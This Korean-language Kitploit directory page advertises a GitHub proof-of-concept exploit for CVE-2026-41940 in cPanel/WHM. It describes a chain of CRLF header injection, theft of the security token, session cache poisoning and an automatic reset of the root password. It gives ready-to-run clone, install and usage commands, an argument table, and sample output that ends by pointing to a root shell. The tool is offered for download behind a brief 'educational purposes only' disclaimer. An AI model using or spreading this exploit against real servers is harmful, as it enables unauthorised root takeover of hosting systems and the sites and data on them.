Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-41940 — # CVE-2026-41940 개념 증명 익스플로잇 CRLF 주입을 사용하여 보안 토큰을 유출하고 루트 비밀번호를 재설정하는 cPanel/WHM의 인증되지 않은 인증 우회 취약점에 대한 개념 증명 익스플로잇입니다. | Kitploit
도구/GitHubGitHub/rosemary1337/cve-2026-41940
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubrosemary1337/cve-2026-41940

CVE-2026-41940

# CVE-2026-41940 개념 증명 익스플로잇 CRLF 주입을 사용하여 보안 토큰을 유출하고 루트 비밀번호를 재설정하는 cPanel/WHM의 인증되지 않은 인증 우회 취약점에 대한 개념 증명 익스플로잇입니다.

저장소 보기
3개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-41940 자동 익스플로잇

Python Status Author


개요

CVE-2026-41940은 cPanel/WHM을 대상으로 하는 개념 증명(PoC) 익스플로잇입니다.
이 익스플로잇은 CRLF 인젝션을 사용하여 보안 토큰을 유출하고 WHM 인터페이스에 대한 루트 수준 접근 권한을 획득하는 인증되지 않은 인증 우회를 시연하며, 루트 비밀번호 변경과 같은 작업을 수행할 수 있게 합니다.

면책 조항: 이 PoC는 교육 목적으로만 제공됩니다. 허가 없이 시스템에 사용하지 마십시오.


기능

  • 호스트 이름 자동 탐지: Host 헤더 제한을 우회하기 위해 표준 호스트 이름을 자동으로 식별합니다.
  • 사전 인증 세션 생성: 인젝션을 위한 유효한 초기 세션을 생성합니다.
  • CRLF 인젝션: 헤더 인젝션을 활용하여 cp_security_token을 유출합니다.
  • 세션 전파: 유출된 토큰을 서버의 인증 캐시에 강제로 주입합니다.
  • 루트 비밀번호 재설정: 우회 성공 시 WHM 루트 비밀번호를 자동으로 변경합니다.
  • 최소 종속성: 표준 requests 라이브러리로 작동합니다.

설치

  1. 저장소를 클론합니다:
root@kitploit:~
git clone https://github.com/Rosemary1337/CVE-2026-41940.git
cd CVE-2026-41940
  1. 종속성을 설치합니다:
root@kitploit:~
pip install requests

요구 사항: requests, urllib3


사용법

root@kitploit:~
python3 CVE_2026_41940.py --target <TARGET_URL> --password <NEW_PASSWORD>

예시:

root@kitploit:~
python3 CVE_2026_41940.py --target https://target.com:2087 --password MyNewRootPass123!

인자


출력

콘솔에 다음이 표시됩니다:

  • 상태 메시지 [0-4]
  • 성공 [+]
  • 실패 [!]
  • 정보 [*]

예시:

root@kitploit:~
[0] hostname = target.local
[1] minting a preauth session...
    session base = :XLNfFj4XjKuS4f9V
[2] sending the CRLF injection (Basic auth + no-ob cookie)...
    HTTP 307, leaked token = /cpsess0555762073
[3] firing do_token_denied to propagate raw -> cache...
    HTTP 401, gadget fired
[4] verifying we're WHM root...
    /json-api/version -> HTTP 200  {"version":"11.110.0.12"}
[*] changing the root password
    passwd -> HTTP 200
[+] now just login to https://target.com:2087 and use the terminal option to get a root shell

보안 및 면책 조항

  • 교육 및 테스트 목적으로만 사용하십시오.
  • 명시적 허가 없이 웹사이트를 공격하지 마십시오.
  • 통제된 실험실 또는 승인된 침투 테스트에서만 사용하십시오.
도구 다운로드
플래그설명필수기본값
--targetWHM 대상 URL (예: https://host:2087)예-
--password루트 사용자의 새 비밀번호예-
--hostnameHost: 헤더 재정의아니요자동